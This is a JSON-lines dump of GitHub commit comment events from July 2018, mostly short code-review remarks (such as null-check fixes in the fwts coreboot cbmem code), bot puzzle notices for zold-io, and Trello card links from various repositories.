{"id":"7943677539","type":"CommitCommentEvent","actor":{"login":"PatrickRudolph"},"repo":{"name":"9elements/fwts"},"payload":{"comment":{"id":29656247,"position":336,"line":336,"path":"src/lib/src/fwts_coreboot_cbmem.c","commit_id":"d187d20ee803613f61777330cabfff8ce0aa67f3","created_at":"2018-07-10T13:08:26Z","updated_at":"2018-07-10T13:08:26Z","author_association":"CONTRIBUTOR","body":"if (!coreboot_log) return  NULL;"}},"created_at":"2018-07-10T13:08:26Z"}
{"id":"7943678752","type":"CommitCommentEvent","actor":{"login":"PatrickRudolph"},"repo":{"name":"9elements/fwts"},"payload":{"comment":{"id":29656248,"position":333,"line":333,"path":"src/lib/src/fwts_coreboot_cbmem.c","commit_id":"d187d20ee803613f61777330cabfff8ce0aa67f3","created_at":"2018-07-10T13:08:37Z","updated_at":"2018-07-10T13:08:37Z","author_association":"CONTRIBUTOR","body":"== NULL"}},"created_at":"2018-07-10T13:08:37Z"}
{"id":"7943679407","type":"CommitCommentEvent","actor":{"login":"DefaltSimon"},"repo":{"name":"eLedina/eLedina-backend"},"payload":{"comment":{"id":29656250,"position":5,"line":224,"path":"core/models.py","commit_id":"95b89a539da389542c43f6000679ae9fbbca044b","created_at":"2018-07-10T13:08:45Z","updated_at":"2018-07-10T13:08:45Z","author_association":"MEMBER","body":"Pazi, tole zna vržt TypeError če je `id` karkol drugega kot string"}},"created_at":"2018-07-10T13:08:45Z"}
{"id":"7943680128","type":"CommitCommentEvent","actor":{"login":"virendra-pathak"},"repo":{"name":"JoeKan/stereoMatching"},"payload":{"comment":{"id":29656251,"position":21,"line":34,"path":"src/utility.cpp","commit_id":"6234d4683ca684e4d166f81a79c1770d7de097ae","created_at":"2018-07-10T13:08:53Z","updated_at":"2018-07-10T13:08:53Z","author_association":"COLLABORATOR","body":"So we will not divide by depth? not even multiply by depth?"}},"created_at":"2018-07-10T13:08:53Z"}
{"id":"7943682550","type":"CommitCommentEvent","actor":{"login":"PatrickRudolph"},"repo":{"name":"9elements/fwts"},"payload":{"comment":{"id":29656255,"position":327,"line":327,"path":"src/lib/src/fwts_coreboot_cbmem.c","commit_id":"d187d20ee803613f61777330cabfff8ce0aa67f3","created_at":"2018-07-10T13:09:18Z","updated_at":"2018-07-10T13:09:18Z","author_association":"CONTRIBUTOR","body":"if (j == ARRAY_SIZE(possible_base_addresses))\r\nreturn NULL;"}},"created_at":"2018-07-10T13:09:18Z"}
{"id":"7943682855","type":"CommitCommentEvent","actor":{"login":"amarp-synerzip"},"repo":{"name":"priyankap-synerzip/MealsPlusAutomation"},"payload":{"comment":{"id":29656256,"position":19,"line":19,"path":"src/test/java/TestCases/AddStudentTest.java","commit_id":"c46b48e12c07ef28294866a48b7e3008dda6b2c4","created_at":"2018-07-10T13:09:22Z","updated_at":"2018-07-10T13:09:22Z","author_association":"COLLABORATOR","body":"why text Group is mentioned in group value? unless you are creating student group."}},"created_at":"2018-07-10T13:09:22Z"}
{"id":"7943683449","type":"CommitCommentEvent","actor":{"login":"PatrickRudolph"},"repo":{"name":"9elements/fwts"},"payload":{"comment":{"id":29656259,"position":324,"line":324,"path":"src/lib/src/fwts_coreboot_cbmem.c","commit_id":"d187d20ee803613f61777330cabfff8ce0aa67f3","created_at":"2018-07-10T13:09:28Z","updated_at":"2018-07-10T13:09:28Z","author_association":"CONTRIBUTOR","body":"Always false"}},"created_at":"2018-07-10T13:09:28Z"}
{"id":"7943684449","type":"CommitCommentEvent","actor":{"login":"PatrickRudolph"},"repo":{"name":"9elements/fwts"},"payload":{"comment":{"id":29656262,"position":342,"line":342,"path":"src/lib/src/fwts_coreboot_cbmem.c","commit_id":"d187d20ee803613f61777330cabfff8ce0aa67f3","created_at":"2018-07-10T13:09:39Z","updated_at":"2018-07-10T13:09:39Z","author_association":"CONTRIBUTOR","body":"remove"}},"created_at":"2018-07-10T13:09:39Z"}
{"id":"7943684638","type":"CommitCommentEvent","actor":{"login":"amarp-synerzip"},"repo":{"name":"priyankap-synerzip/MealsPlusAutomation"},"payload":{"comment":{"id":29656263,"position":5,"line":16,"path":"src/main/java/K12PaymentCenter/pages/DashboardPage.java","commit_id":"c46b48e12c07ef28294866a48b7e3008dda6b2c4","created_at":"2018-07-10T13:09:41Z","updated_at":"2018-07-10T13:09:41Z","author_association":"COLLABORATOR","body":"make private"}},"created_at":"2018-07-10T13:09:41Z"}
{"id":"7943686706","type":"CommitCommentEvent","actor":{"login":"PatrickRudolph"},"repo":{"name":"9elements/fwts"},"payload":{"comment":{"id":29656271,"position":337,"line":337,"path":"src/lib/src/fwts_coreboot_cbmem.c","commit_id":"d187d20ee803613f61777330cabfff8ce0aa67f3","created_at":"2018-07-10T13:10:03Z","updated_at":"2018-07-10T13:10:03Z","author_association":"CONTRIBUTOR","body":"check return value"}},"created_at":"2018-07-10T13:10:03Z"}
{"id":"7943688333","type":"CommitCommentEvent","actor":{"login":"jarvist"},"repo":{"name":"jarvist/TheDancer.jl"},"payload":{"comment":{"id":29656274,"position":null,"line":null,"path":null,"commit_id":"d5b5697b9324873d590824946b71c6099094aa9e","created_at":"2018-07-10T13:10:19Z","updated_at":"2018-07-10T13:10:19Z","author_association":"OWNER","body":"@RoseTeague ; I started editing the comments -> docstrings + etc. \r\nI'm a bit confused by init (I renamed it init! as it edits state). \r\n\r\nI found the Julia style guide which suggested CamelCase only for module names + structs, snake_case for variables and functions. "}},"created_at":"2018-07-10T13:10:19Z"}
{"id":"7943688655","type":"CommitCommentEvent","actor":{"login":"Kiel1050"},"repo":{"name":"NguyenHuuDuc1006/PHPDN33_DTTT"},"payload":{"comment":{"id":29656276,"position":3,"line":3,"path":"README.md","commit_id":"fdee0b2891b1af960350303cdbb08c4d446fd3fb","created_at":"2018-07-10T13:10:23Z","updated_at":"2018-07-10T13:10:23Z","author_association":"NONE","body":"hihi"}},"created_at":"2018-07-10T13:10:23Z"}
{"id":"7943689429","type":"CommitCommentEvent","actor":{"login":"PatrickRudolph"},"repo":{"name":"9elements/fwts"},"payload":{"comment":{"id":29656277,"position":270,"line":270,"path":"src/lib/src/fwts_coreboot_cbmem.c","commit_id":"d187d20ee803613f61777330cabfff8ce0aa67f3","created_at":"2018-07-10T13:10:31Z","updated_at":"2018-07-10T13:10:31Z","author_association":"CONTRIBUTOR","body":"memcpy ?"}},"created_at":"2018-07-10T13:10:31Z"}
{"id":"7943691796","type":"CommitCommentEvent","actor":{"login":"kapit4n"},"repo":{"name":"kapit4n/ng-school-events"},"payload":{"comment":{"id":29656282,"position":7,"line":7,"path":"src/app/services/socket.service.ts","commit_id":"975d2dd24134ee73e26b08fd462ac8dd05766c9f","created_at":"2018-07-10T13:10:55Z","updated_at":"2018-07-10T13:10:55Z","author_association":"OWNER","body":"Move it to config"}},"created_at":"2018-07-10T13:10:55Z"}
{"id":"7943693384","type":"CommitCommentEvent","actor":{"login":"joshmh"},"repo":{"name":"lamassu/lamassu-machine"},"payload":{"comment":{"id":29656285,"position":null,"line":null,"path":null,"commit_id":"dc8edf5d4031f1079e355b01324274ac5770c90a","created_at":"2018-07-10T13:11:11Z","updated_at":"2018-07-10T13:11:11Z","author_association":"MEMBER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Remove Lightning until Asinq implements QR](https://trello.com/c/iMbxRwqy/561-remove-lightning-until-asinq-implements-qr)"}},"created_at":"2018-07-10T13:11:11Z"}
{"id":"7943693714","type":"CommitCommentEvent","actor":{"login":"henryju"},"repo":{"name":"SonarSource/sonar-scm-svn"},"payload":{"comment":{"id":29656286,"position":null,"line":null,"path":null,"commit_id":"a97cda218a9cf6d2ed455a32cd429c18dcc2b732","created_at":"2018-07-10T13:11:15Z","updated_at":"2018-07-10T13:11:15Z","author_association":"MEMBER","body":"I just started the release. It should appear in the update center in the coming days."}},"created_at":"2018-07-10T13:11:15Z"}
{"id":"7943694272","type":"CommitCommentEvent","actor":{"login":"jnm2"},"repo":{"name":"nunit/nunit"},"payload":{"comment":{"id":29656287,"position":null,"line":null,"path":null,"commit_id":"2e19b4e99144ce1c9437b4e9a03987987b9aaf64","created_at":"2018-07-10T13:11:20Z","updated_at":"2018-07-10T13:11:20Z","author_association":"CONTRIBUTOR","body":"Okay. Abortable teardown was the very thing this PR set out to fix, so I don't think we would consider reversing it."}},"created_at":"2018-07-10T13:11:20Z"}
{"id":"7943698441","type":"CommitCommentEvent","actor":{"login":"joshmh"},"repo":{"name":"lamassu/lamassu-server"},"payload":{"comment":{"id":29656297,"position":null,"line":null,"path":null,"commit_id":"977d8ad05406937f6fbeffe731fa9530df25401b","created_at":"2018-07-10T13:12:04Z","updated_at":"2018-07-10T13:12:04Z","author_association":"MEMBER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Remove Lightning until Asinq implements QR](https://trello.com/c/iMbxRwqy/561-remove-lightning-until-asinq-implements-qr)"}},"created_at":"2018-07-10T13:12:04Z"}
{"id":"7943700095","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zold-io/java-api"},"payload":{"comment":{"id":29656299,"position":null,"line":null,"path":null,"commit_id":"1405fe34b5be0e02132acb21aae7102e3d57bc2f","created_at":"2018-07-10T13:12:21Z","updated_at":"2018-07-10T13:12:21Z","author_association":"NONE","body":"Puzzle `6-f97f5c14` disappeared from [`src/main/java/io/zold/api/Wallet.java`](https://github.com/zold-io/java-api/blob/master/src/main/java/io/zold/api/Wallet.java), that's why I closed #15. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-10T13:12:21Z"}
{"id":"7943700369","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zold-io/java-api"},"payload":{"comment":{"id":29656302,"position":null,"line":null,"path":null,"commit_id":"1405fe34b5be0e02132acb21aae7102e3d57bc2f","created_at":"2018-07-10T13:12:23Z","updated_at":"2018-07-10T13:12:23Z","author_association":"NONE","body":"Puzzle `15-b88242e3` discovered in   [`src/main/java/io/zold/api/RtTransaction.java`](  https://github.com/zold-io/java-api/blob/master/src/main/java/io/zold/api/RtTransaction.java)   and submitted as #21. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-10T13:12:23Z"}
{"id":"7943700622","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zold-io/java-api"},"payload":{"comment":{"id":29656303,"position":null,"line":null,"path":null,"commit_id":"1405fe34b5be0e02132acb21aae7102e3d57bc2f","created_at":"2018-07-10T13:12:26Z","updated_at":"2018-07-10T13:12:26Z","author_association":"NONE","body":"Puzzle `15-4f67a35d` discovered in   [`src/main/java/io/zold/api/RtTransaction.java`](  https://github.com/zold-io/java-api/blob/master/src/main/java/io/zold/api/RtTransaction.java)   and submitted as #22. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-10T13:12:26Z"}
{"id":"7943700949","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zold-io/java-api"},"payload":{"comment":{"id":29656304,"position":null,"line":null,"path":null,"commit_id":"1405fe34b5be0e02132acb21aae7102e3d57bc2f","created_at":"2018-07-10T13:12:30Z","updated_at":"2018-07-10T13:12:30Z","author_association":"NONE","body":"Puzzle `15-1e017e66` discovered in   [`src/main/java/io/zold/api/RtTransaction.java`](  https://github.com/zold-io/java-api/blob/master/src/main/java/io/zold/api/RtTransaction.java)   and submitted as #23. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-10T13:12:30Z"}
{"id":"7943701334","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zold-io/java-api"},"payload":{"comment":{"id":29656305,"position":null,"line":null,"path":null,"commit_id":"1405fe34b5be0e02132acb21aae7102e3d57bc2f","created_at":"2018-07-10T13:12:33Z","updated_at":"2018-07-10T13:12:33Z","author_association":"NONE","body":"Puzzle `15-a01f2b41` discovered in   [`src/main/java/io/zold/api/RtTransaction.java`](  https://github.com/zold-io/java-api/blob/master/src/main/java/io/zold/api/RtTransaction.java)   and submitted as #24. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-10T13:12:33Z"}
{"id":"7943701467","type":"CommitCommentEvent","actor":{"login":"bornabesic"},"repo":{"name":"bornabesic/cytokine-graph-db"},"payload":{"comment":{"id":29656307,"position":null,"line":null,"path":null,"commit_id":"97a8bde08473d19ff2dbbfda82ae39c2e9b3146c","created_at":"2018-07-10T13:12:35Z","updated_at":"2018-07-10T13:12:35Z","author_association":"OWNER","body":"Yes, that's a practical solution, because Neo4j doesn't require to specify a relationship direction in the query"}},"created_at":"2018-07-10T13:12:35Z"}
{"id":"7943701556","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zold-io/java-api"},"payload":{"comment":{"id":29656308,"position":null,"line":null,"path":null,"commit_id":"1405fe34b5be0e02132acb21aae7102e3d57bc2f","created_at":"2018-07-10T13:12:36Z","updated_at":"2018-07-10T13:12:36Z","author_association":"NONE","body":"Puzzle `15-f9a60893` discovered in   [`src/main/java/io/zold/api/RtTransaction.java`](  https://github.com/zold-io/java-api/blob/master/src/main/java/io/zold/api/RtTransaction.java)   and submitted as #25. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-10T13:12:36Z"}
{"id":"7943701760","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zold-io/java-api"},"payload":{"comment":{"id":29656310,"position":null,"line":null,"path":null,"commit_id":"1405fe34b5be0e02132acb21aae7102e3d57bc2f","created_at":"2018-07-10T13:12:38Z","updated_at":"2018-07-10T13:12:38Z","author_association":"NONE","body":"Puzzle `15-957c2199` discovered in   [`src/main/java/io/zold/api/RtTransaction.java`](  https://github.com/zold-io/java-api/blob/master/src/main/java/io/zold/api/RtTransaction.java)   and submitted as #26. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-10T13:12:38Z"}
{"id":"7943701964","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zold-io/java-api"},"payload":{"comment":{"id":29656311,"position":null,"line":null,"path":null,"commit_id":"1405fe34b5be0e02132acb21aae7102e3d57bc2f","created_at":"2018-07-10T13:12:40Z","updated_at":"2018-07-10T13:12:40Z","author_association":"NONE","body":"Puzzle `15-ad2b4fa5` discovered in   [`src/main/java/io/zold/api/RtTransaction.java`](  https://github.com/zold-io/java-api/blob/master/src/main/java/io/zold/api/RtTransaction.java)   and submitted as #27. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-10T13:12:40Z"}
{"id":"7943702233","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zold-io/java-api"},"payload":{"comment":{"id":29656312,"position":null,"line":null,"path":null,"commit_id":"1405fe34b5be0e02132acb21aae7102e3d57bc2f","created_at":"2018-07-10T13:12:43Z","updated_at":"2018-07-10T13:12:43Z","author_association":"NONE","body":"Puzzle `15-0d2d728d` discovered in   [`src/main/java/io/zold/api/RtTransaction.java`](  https://github.com/zold-io/java-api/blob/master/src/main/java/io/zold/api/RtTransaction.java)   and submitted as #28. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-10T13:12:43Z"}
{"id":"7943702499","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zold-io/java-api"},"payload":{"comment":{"id":29656313,"position":null,"line":null,"path":null,"commit_id":"1405fe34b5be0e02132acb21aae7102e3d57bc2f","created_at":"2018-07-10T13:12:45Z","updated_at":"2018-07-10T13:12:45Z","author_association":"NONE","body":"Puzzle `15-0b8da355` discovered in   [`src/main/java/io/zold/api/Wallet.java`](  https://github.com/zold-io/java-api/blob/master/src/main/java/io/zold/api/Wallet.java)   and submitted as #29. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-10T13:12:45Z"}
{"id":"7943707716","type":"CommitCommentEvent","actor":{"login":"yanmarkman"},"repo":{"name":"MISL-EBU-System-SW/mainline-public"},"payload":{"comment":{"id":29656323,"position":null,"line":null,"path":null,"commit_id":"dfbca9e1ecefdf5b297c738f5ce537972b1bc4cb","created_at":"2018-07-10T13:13:36Z","updated_at":"2018-07-10T13:13:36Z","author_association":"NONE","body":"TYPO in-commit-description: This commits moves..\". I suppose should be \"This commit moves...\""}},"created_at":"2018-07-10T13:13:36Z"}
{"id":"7943708801","type":"CommitCommentEvent","actor":{"login":"ngoctrongbg"},"repo":{"name":"ngoctrongbg/PHPDN33_DTTT"},"payload":{"comment":{"id":29656326,"position":null,"line":null,"path":null,"commit_id":"adb7af82c3f64b2b47cf8108db0eef42db1fe601","created_at":"2018-07-10T13:13:47Z","updated_at":"2018-07-10T13:13:47Z","author_association":"OWNER","body":"szc,zsn v,adnvk,ava"}},"created_at":"2018-07-10T13:13:47Z"}
{"id":"7943710070","type":"CommitCommentEvent","actor":{"login":"kapit4n"},"repo":{"name":"kapit4n/ng-school-events"},"payload":{"comment":{"id":29656332,"position":5,"line":81,"path":"src/polyfills.ts","commit_id":"975d2dd24134ee73e26b08fd462ac8dd05766c9f","created_at":"2018-07-10T13:14:00Z","updated_at":"2018-07-10T13:14:00Z","author_association":"OWNER","body":"Comment this why it was added"}},"created_at":"2018-07-10T13:14:00Z"}
{"id":"7943712967","type":"CommitCommentEvent","actor":{"login":"dougsyer"},"repo":{"name":"zenoss/ZenPacks.zenoss.Microsoft.Windows"},"payload":{"comment":{"id":29656340,"position":null,"line":null,"path":null,"commit_id":"d33a322dd6f4a2160f8c71bc1f1ee73d17d1c62a","created_at":"2018-07-10T13:14:30Z","updated_at":"2018-07-10T13:14:30Z","author_association":"NONE","body":"im seeing issues like this and we are also seeing connectivity errors resulting in perfmon polling silently failing until the next config cycle.  in this case i saw a twisted \"No Route to Host\" in the log 3 times quickly but the long running task doesnt appear to be restarting.  i have a case open."}},"created_at":"2018-07-10T13:14:30Z"}
{"id":"7943718270","type":"CommitCommentEvent","actor":{"login":"DefaltSimon"},"repo":{"name":"eLedina/eLedina-backend"},"payload":{"comment":{"id":29656359,"position":18,"line":289,"path":"eledina/api/api_blueprint.py","commit_id":"95b89a539da389542c43f6000679ae9fbbca044b","created_at":"2018-07-10T13:15:26Z","updated_at":"2018-07-10T13:15:26Z","author_association":"MEMBER","body":"Raje kot da gledaš čez cel dictionary če kaj manjka, raje v [models.py na 224](https://github.com/eLedina/eLedina-backend/blob/ups-this-is-public-so-no-nasty-names/core/models.py#L224) preveri če je `blog` None (kar bi pomenilo, da blog manjka) in samo vrži exception, ki ga lahko ustvariš v [exceptions.py](https://github.com/eLedina/eLedina-backend/blob/ups-this-is-public-so-no-nasty-names/core/exceptions.py)"}},"created_at":"2018-07-10T13:15:26Z"}
{"id":"7943719543","type":"CommitCommentEvent","actor":{"login":"gbesnard"},"repo":{"name":"nanvix/nanvix"},"payload":{"comment":{"id":29656362,"position":null,"line":null,"path":null,"commit_id":"599627b8e4c665c865d0f537245b4797047002de","created_at":"2018-07-10T13:15:39Z","updated_at":"2018-07-10T13:15:39Z","author_association":"NONE","body":"Proposed solution regarding issue #234"}},"created_at":"2018-07-10T13:15:39Z"}
{"id":"7943720389","type":"CommitCommentEvent","actor":{"login":"NguyenHuuDuc1006"},"repo":{"name":"ngoctrongbg/PHPDN33_DTTT"},"payload":{"comment":{"id":29656367,"position":null,"line":null,"path":null,"commit_id":"adb7af82c3f64b2b47cf8108db0eef42db1fe601","created_at":"2018-07-10T13:15:47Z","updated_at":"2018-07-10T13:15:47Z","author_association":"NONE","body":"hiihi"}},"created_at":"2018-07-10T13:15:47Z"}
{"id":"7943749662","type":"CommitCommentEvent","actor":{"login":"aab-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29656433,"position":null,"line":null,"path":null,"commit_id":"c2b3837a9f3e0cc9b72a05382bc3230a74d1a498","created_at":"2018-07-10T13:20:46Z","updated_at":"2018-07-10T13:20:46Z","author_association":"NONE","body":":+1: "}},"created_at":"2018-07-10T13:20:46Z"}
{"id":"7943750205","type":"CommitCommentEvent","actor":{"login":"mwojtkowski"},"repo":{"name":"mwojtkowski/Ovale"},"payload":{"comment":{"id":29656434,"position":null,"line":null,"path":null,"commit_id":"9924643cb4a507f1dfbfa402d46ca46797405454","created_at":"2018-07-10T13:20:52Z","updated_at":"2018-07-10T13:20:52Z","author_association":"OWNER","body":"I see, in your usecase you need to scan every UnitId. I could add options to enable/disable this functionality on Ovale options.\r\n\r\nMain reason behind adding this was because people with less powerful PCs were reporting FPS/stuttering issues in raids. It also helps with more complicated scripts that have lot of BuffPresent() target.DebuffPresent() and BuffCountOnAny() functions that loops over aura table\r\n\r\nI added option in Advanced menu to enable/disable filter function \r\nPlayer only Buffs\r\nPlayer only Debuffs\r\nand something like Laptop Mode where it restrict it to target, player, pet, focus and filter auras to only PLAYER\r\n\r\nBuffCountOnAny scans through auraDB table that is populated by UNIT_AURA scans\r\n\r\nBuffCountOnAny(pwer_word_shield) - will count PWS casted by player on any target so with \r\n HELPFUL|PLAYER flag it will work as intended.\r\nBuffCountOnAny(pwer_word_shield any=1) - will count PWS casted by anyone on any target this wont work with HELPFUL|PLAYER flag as it won't count PSW casted by other Priests so it will return same result as BuffCountOnAny(pwer_word_shield) you need only HELPFUL for it to work properly"}},"created_at":"2018-07-10T13:20:52Z"}
{"id":"7943751219","type":"CommitCommentEvent","actor":{"login":"jlstevens"},"repo":{"name":"pyviz/pyviz"},"payload":{"comment":{"id":29656436,"position":null,"line":null,"path":null,"commit_id":"378b2e80acfeb4f2dc04c7cdced9482ccff8b200","created_at":"2018-07-10T13:21:03Z","updated_at":"2018-07-10T13:21:03Z","author_association":"COLLABORATOR","body":"I didn't have time to track down the issue so I just replaced the links with ones I knew would work. I'll look into the DNS configuration suggestion now."}},"created_at":"2018-07-10T13:21:03Z"}
{"id":"7943753172","type":"CommitCommentEvent","actor":{"login":"rxaviers"},"repo":{"name":"rxaviers/cldr-data-downloader"},"payload":{"comment":{"id":29656439,"position":null,"line":null,"path":null,"commit_id":"83c3e08908ec68eb0a5b91b29fd5ee4da24cc2cb","created_at":"2018-07-10T13:21:23Z","updated_at":"2018-07-10T13:21:23Z","author_association":"OWNER","body":"Hi @omerlh, it took me awhile to see your comment, but yeap there are new releases and this should be fixed, please let me know otherwise. Thanks"}},"created_at":"2018-07-10T13:21:23Z"}
{"id":"7943756090","type":"CommitCommentEvent","actor":{"login":"rekovic"},"repo":{"name":"cerminar/cmssw"},"payload":{"comment":{"id":29656445,"position":null,"line":null,"path":null,"commit_id":"7a9e16c035e66a43a32980031ef8165542164940","created_at":"2018-07-10T13:21:53Z","updated_at":"2018-07-10T13:21:53Z","author_association":"NONE","body":"@mcepeda @cerminar \r\nThere is https://github.com/PFCal-dev/cmssw/releases/tag/v2.7_1017 which is based on 10_1_7\r\nwhich contains HGC EG BDT ID, among other things. \r\nI am planning to update the L1T Phase-2 recipe to use latest tag `l1t-phase2-v2.16.10` with  10_1_7.\r\nOne can then use the above PFCal-dev tag v2.7_1017 to have access to the HGC EG BDT ID .  Do you intend to use it?\r\n\r\n"}},"created_at":"2018-07-10T13:21:53Z"}
{"id":"7943761252","type":"CommitCommentEvent","actor":{"login":"cgundogan"},"repo":{"name":"RIOT-OS/RIOT"},"payload":{"comment":{"id":29656457,"position":null,"line":null,"path":null,"commit_id":"202e73dcdf8dd69dcf3291e95580df96cfb4d15a","created_at":"2018-07-10T13:22:42Z","updated_at":"2018-07-10T13:22:42Z","author_association":"MEMBER","body":"```make\r\nmake info-build\r\n```"}},"created_at":"2018-07-10T13:22:42Z"}
{"id":"7943761615","type":"CommitCommentEvent","actor":{"login":"mattpitkin"},"repo":{"name":"mattpitkin/yamm"},"payload":{"comment":{"id":29656459,"position":null,"line":null,"path":null,"commit_id":"24302de4a9b01be92d17e73ad19ebea6ec62e1f7","created_at":"2018-07-10T13:22:46Z","updated_at":"2018-07-10T13:22:46Z","author_association":"OWNER","body":"Hi @Hauffo. Thanks for your question. Unfortunately it's not currently possible to have a multivariate normal prior in the code. The best you could do would be (if possible) to find a orthogonal parameterisation and set each parameter as having an independent 'gaussian' prior.\r\n\r\nIt would be possible to modify the code to do what you require, but I'm not really actively developing YAMM any more. It may be better to look at some better maintained Matlab MCMC codes to see if they meet your requirements."}},"created_at":"2018-07-10T13:22:46Z"}
{"id":"7943762780","type":"CommitCommentEvent","actor":{"login":"lclausen-adi"},"repo":{"name":"analogdevicesinc/hdl"},"payload":{"comment":{"id":29656462,"position":13,"line":74,"path":"projects/scripts/adi_board.tcl","commit_id":"0c04f17304b8e5a4bad56853b7eabdcd151d0058","created_at":"2018-07-10T13:22:58Z","updated_at":"2018-07-10T13:22:58Z","author_association":"NONE","body":"Needs to be [expr (1 << $p_size) - 1]"}},"created_at":"2018-07-10T13:22:58Z"}
{"id":"7943800196","type":"CommitCommentEvent","actor":{"login":"MastaG"},"repo":{"name":"PLi-metas/pli-extras"},"payload":{"comment":{"id":29656558,"position":null,"line":null,"path":null,"commit_id":"33c8e9eea128dd2146507c568ed2a956bcad4ebb","created_at":"2018-07-10T13:29:07Z","updated_at":"2018-07-10T13:29:07Z","author_association":"MEMBER","body":"thank you Hains!"}},"created_at":"2018-07-10T13:29:07Z"}
{"id":"7943810744","type":"CommitCommentEvent","actor":{"login":"ablodge"},"repo":{"name":"nert-gu/Xposition"},"payload":{"comment":{"id":29656583,"position":null,"line":null,"path":null,"commit_id":"12e768ed5d8e46f0c97ace1485f7453a18af363a","created_at":"2018-07-10T13:30:47Z","updated_at":"2018-07-10T13:30:47Z","author_association":"CONTRIBUTOR","body":"Gotcha!"}},"created_at":"2018-07-10T13:30:47Z"}
{"id":"7943812332","type":"CommitCommentEvent","actor":{"login":"rpv-tomsk"},"repo":{"name":"octo/librouteros"},"payload":{"comment":{"id":29656593,"position":null,"line":null,"path":null,"commit_id":"b020d5c871e57cc765abaf6d0a7721593e2bceed","created_at":"2018-07-10T13:31:02Z","updated_at":"2018-07-10T13:31:02Z","author_association":"CONTRIBUTOR","body":"We might to add INFO message into Collectd routeros plugin with recommendation to update librouteros. What do you think?"}},"created_at":"2018-07-10T13:31:02Z"}
{"id":"7943812861","type":"CommitCommentEvent","actor":{"login":"wy"},"repo":{"name":"neo-ngd/Happynodes"},"payload":{"comment":{"id":29656595,"position":150,"line":277,"path":"neo-collector/insert/insertData.py","commit_id":"42feaf186710ce47a1f3e1579f9bf4b424b1461a","created_at":"2018-07-10T13:31:08Z","updated_at":"2018-07-10T13:31:08Z","author_association":"COLLABORATOR","body":"Chunks is spelt wrong. Can you fix"}},"created_at":"2018-07-10T13:31:08Z"}
{"id":"7943814100","type":"CommitCommentEvent","actor":{"login":"sylvblck"},"repo":{"name":"9elements/fwts"},"payload":{"comment":{"id":29656600,"position":333,"line":333,"path":"src/lib/src/fwts_coreboot_cbmem.c","commit_id":"d187d20ee803613f61777330cabfff8ce0aa67f3","created_at":"2018-07-10T13:31:20Z","updated_at":"2018-07-10T13:31:20Z","author_association":"COLLABORATOR","body":"map_memory returns FWTS_MAP_FAILED on failure.\r\nFWTS_MAP_FAILED = (void*) -1"}},"created_at":"2018-07-10T13:31:20Z"}
{"id":"7943814659","type":"CommitCommentEvent","actor":{"login":"endom4086"},"repo":{"name":"hwahyang1/ru-top-bot-discord"},"payload":{"comment":{"id":29656601,"position":null,"line":null,"path":null,"commit_id":"45c2681d17d8c0bd4d0a16125496d97e4ec63e6d","created_at":"2018-07-10T13:31:26Z","updated_at":"2018-07-10T13:31:26Z","author_association":"COLLABORATOR","body":"이거 말고 제가 pull request에 올린 것에 source chang인가? 그걸로 바꿔주세요."}},"created_at":"2018-07-10T13:31:26Z"}
{"id":"7943815563","type":"CommitCommentEvent","actor":{"login":"endom4086"},"repo":{"name":"hwahyang1/ru-top-bot-discord"},"payload":{"comment":{"id":29656606,"position":null,"line":null,"path":null,"commit_id":"45c2681d17d8c0bd4d0a16125496d97e4ec63e6d","created_at":"2018-07-10T13:31:35Z","updated_at":"2018-07-10T13:31:35Z","author_association":"COLLABORATOR","body":"제가 수정하려 하니까 안되네요;;"}},"created_at":"2018-07-10T13:31:35Z"}
{"id":"7943822591","type":"CommitCommentEvent","actor":{"login":"sylvblck"},"repo":{"name":"9elements/fwts"},"payload":{"comment":{"id":29656619,"position":96,"line":96,"path":"src/lib/src/fwts_coreboot_cbmem.c","commit_id":"d187d20ee803613f61777330cabfff8ce0aa67f3","created_at":"2018-07-10T13:32:40Z","updated_at":"2018-07-10T13:32:40Z","author_association":"COLLABORATOR","body":"update:\r\nif (!mem)\r\nreturn FWTS_MAP_FAILED;"}},"created_at":"2018-07-10T13:32:40Z"}
{"id":"7943825737","type":"CommitCommentEvent","actor":{"login":"sklar"},"repo":{"name":"datasapiens/ui-kit"},"payload":{"comment":{"id":29656625,"position":null,"line":null,"path":null,"commit_id":"a814bd8e9207ce5dd812d029498ba998f5f4d812","created_at":"2018-07-10T13:33:11Z","updated_at":"2018-07-10T13:33:11Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Filter: Scrollbars as default](https://trello.com/c/mtD7V2Db/2194-filter-scrollbars-as-default)"}},"created_at":"2018-07-10T13:33:11Z"}
